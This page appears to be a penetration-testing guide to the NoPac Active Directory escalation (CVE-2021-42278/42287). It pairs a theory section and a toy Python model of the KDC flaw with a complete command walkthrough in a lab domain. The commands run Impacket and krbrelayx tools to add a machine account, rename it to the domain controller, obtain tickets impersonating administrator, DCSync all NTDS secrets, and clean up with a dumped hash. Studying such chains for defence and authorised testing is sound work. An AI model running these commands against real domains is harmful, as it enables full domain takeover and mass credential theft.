
Semi Manual Exploit


Last updated 2 years ago

Theory

In November 2021, two vulnerabilities caught the attention of many security researchers as they could allow domain escalation from a standard user.

CVE-2021-42278 - Name impersonation

Computer accounts should have a trailing $ in their name (i.e. sAMAccountName attribute) but no validation process existed to make sure of it. Abused in combination with CVE-2021-42287, it allowed attackers to impersonate domain controller accounts.

CVE-2021-42287 - KDC bamboozling

When requesting a service ticket, a TGT must be presented first. If the account named in that TGT is not found by the KDC, the KDC automatically searches again with a trailing $ appended to the name. So if a TGT is obtained for bob, and the bob account is then removed (or renamed), using that TGT to request a service ticket to itself on behalf of another user (S4U2self) makes the KDC look up bob$ in AD. If the domain controller account bob$ exists, bob (the user) has just obtained a service ticket for bob$ (the domain controller account) as that other user.

Machine Account

The ability to edit a machine account's sAMAccountName and servicePrincipalName attributes is a prerequisite for the attack chain. The easiest way to get it is to create a computer account (e.g. by leveraging the MachineAccountQuota domain-level attribute if it is greater than 0): the creator of a new machine account has enough privileges to edit its attributes. Alternatively, taking control of the owner/creator of an existing computer account will do.

The attack can then be conducted as follows.

  1. Clear the controlled machine account's servicePrincipalName attribute of any value that points to its name (e.g. host/machine.domain.local, RestrictedKrbHost/machine.domain.local)

  2. Change the controlled machine account's sAMAccountName to a Domain Controller's name without the trailing $

  3. Request a TGT for the controlled machine account

  4. Reset the controlled machine account's sAMAccountName to its old value (or anything other than the Domain Controller's name without the trailing $)

  5. Request a service ticket with S4U2self by presenting the TGT obtained before

  6. Get access to the domain controller (e.g. DCSync)
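The KDC lookup described in the Theory section and the six steps above, modelled as an added example: this is illustrative code written for this page, not Microsoft's KDC logic and not the page's own tooling. The directory contents, SIDs and names are constructed. `patched=True` models the check KB5008380 added, which ties a TGT to the SID of the account that requested it (the PAC_REQUESTOR buffer) and rejects the S4U2self request with KDC_ERR_TGT_REVOKED when the fallback lookup lands on a different account:

```python
"""Toy KDC model of the CVE-2021-42287 name fallback (added example, not the page's code).

Only the name resolution is modelled: an exact sAMAccountName lookup, then a retry
with a trailing '$'. Accounts, SIDs and error names below are constructed.
"""
from dataclasses import dataclass


@dataclass
class Account:
    sam: str           # sAMAccountName, e.g. 'nyc$'
    sid: str           # objectSid


@dataclass
class TGT:
    cname: str         # client name written into the ticket at AS-REQ time
    requestor_sid: str # SID the patched KDC records for the requesting account


class Directory:
    """Minimal AD stand-in: case-insensitive sAMAccountName index."""

    def __init__(self, *accounts):
        self.by_name = {a.sam.lower(): a for a in accounts}

    def lookup(self, sam):
        return self.by_name.get(sam.lower())

    def rename(self, old, new):
        # CVE-2021-42278: nothing validated that a computer account keeps its '$'
        acct = self.by_name.pop(old.lower())
        acct.sam = new
        self.by_name[new.lower()] = acct


def as_req(directory, sam):
    """AS-REQ: a TGT is issued for the account as it is named right now."""
    acct = directory.lookup(sam)
    if acct is None:
        raise PermissionError("KDC_ERR_C_PRINCIPAL_UNKNOWN")
    return TGT(cname=acct.sam, requestor_sid=acct.sid)


def resolve_client(directory, tgt):
    """The vulnerable KDC behaviour on S4U2self: exact lookup, then retry with '$'."""
    return directory.lookup(tgt.cname) or directory.lookup(tgt.cname + "$")


def s4u2self(directory, tgt, impersonate, patched=False):
    """Return the sAMAccountName the resulting service ticket is issued for."""
    acct = resolve_client(directory, tgt)
    if acct is None:
        raise PermissionError("KDC_ERR_C_PRINCIPAL_UNKNOWN")
    if patched and acct.sid != tgt.requestor_sid:
        # KB5008380: the account found must be the one that obtained the TGT
        raise PermissionError("KDC_ERR_TGT_REVOKED")
    return acct.sam


def nopac(patched=False):
    """Steps 2-5 from the list above against the constructed directory."""
    dc = Account("nyc$", "S-1-5-21-1-1-1-1000")            # the DC's machine account
    mine = Account("samaccountname$", "S-1-5-21-1-1-1-1105")  # account we control
    d = Directory(dc, mine)
    d.rename("samaccountname$", "nyc")      # step 2: DC name without the '$'
    tgt = as_req(d, "nyc")                  # step 3: TGT now carries cname=nyc
    d.rename("nyc", "samaccountname$")      # step 4: revert, 'nyc' no longer exists
    return s4u2self(d, tgt, "administrator", patched=patched)  # step 5: lands on nyc$
```

On an unpatched KDC `nopac()` returns `'nyc$'`, i.e. a service ticket for the domain controller account as administrator; with `patched=True` the same sequence raises KDC_ERR_TGT_REVOKED, which is also the error the public NoPac scanners key on to tell patched DCs apart.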

CVE-2021-42287 is a privilege escalation vulnerability associated with the Kerberos Privilege Attribute Certificate (PAC) in Active Directory Domain Services (AD DS). CVE-2021-42278 is a Security Account Manager (SAM) spoofing security bypass vulnerability. Threat actors could leverage these flaws to escalate to domain administrator privileges from a standard user account.

Gaining domain administrator access

What we will do is add a computer, clear that computer's SPNs, rename it to the same name as the DC, obtain a TGT for it, rename it back to its original name, obtain a service ticket with the TGT we got previously and finally DCSync.

Get renameMachine.py and Addspn.py

git clone https://github.com/dirkjanm/krbrelayx.git
wget https://raw.githubusercontent.com/rabakuku/AD-TOOLS/main/addspn.py
mv addspn.py krbrelayx/.
cd krbrelayx
  • Add a new computer

addcomputer.py -computer-name 'samaccountname$' -computer-pass 'ComputerPassword' -dc-host nyc.newyork.local -domain-netbios newyork 'newyork.local/Donald.Trump:MaKeam3ricaGr3at'
python3 addspn.py --clear -t 'samaccountname$' -u 'newyork.local\Donald.Trump' -p 'MaKeam3ricaGr3at' 'nyc.newyork.local'
  • Rename the computer (computer -> DC)

python3 renameMachine.py -current-name 'samaccountname$' -new-name 'nyc' -dc-ip 'nyc.newyork.local' newyork.local/Donald.Trump:MaKeam3ricaGr3at
  • Obtain a TGT

getTGT.py -dc-ip 'nyc.newyork.local' 'newyork.local'/'nyc':'ComputerPassword'
  • Reset the computer name back to the original name

python3 renameMachine.py -current-name 'nyc' -new-name 'samaccountname$' newyork.local/Donald.Trump:MaKeam3ricaGr3at
  • Obtain a service ticket with S4U2self by presenting the previous TGT (the -spn form below is for the Impacket build shown in the output further down; newer Impacket releases also offer getST.py -self -altservice 'CIFS/nyc.newyork.local' for this step)

export KRB5CCNAME=/home/kali/krbrelayx/nyc.ccache
getST.py -impersonate 'administrator' -spn 'CIFS/nyc.newyork.local' -k -no-pass -dc-ip 'nyc.newyork.local' 'newyork.local'/'nyc'
  • DCSync by presenting the service ticket

export KRB5CCNAME=/home/kali/krbrelayx/administrator@CIFS_nyc.newyork.local@NEWYORK.LOCAL.ccache
secretsdump.py -k -no-pass -dc-ip 'nyc.newyork.local' @'nyc.newyork.local'
  • And voilà, we got the whole domain's NTDS.DIT secrets :)

  • Now clean up by deleting the computer we created, using the Administrator hash we just dumped (the account that created a machine account through MachineAccountQuota cannot delete it, hence the admin credentials)

addcomputer.py -computer-name 'samaccountname$' -delete -dc-host nyc.newyork.local -domain-netbios NEWYORK -hashes 'aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e' 'newyork.local/Administrator'
Impacket v0.10.1.dev1+20220708.213759.8b1a99f7 - Copyright 2022 SecureAuth Corporation
[*] Successfully deleted samaccountname$.

NoPac relies on changing the sAMAccountName of a computer account to the name of a domain controller. By default, every authenticated user can add up to ten computers to the domain (ms-DS-MachineAccountQuota), which is what supplies the controlled machine account. The SPN clearing in the first step uses addspn.py from Dirk-jan Mollema's krbrelayx; the rest of the chain is as shown above: rename, TGT, rename back, S4U2self, DCSync.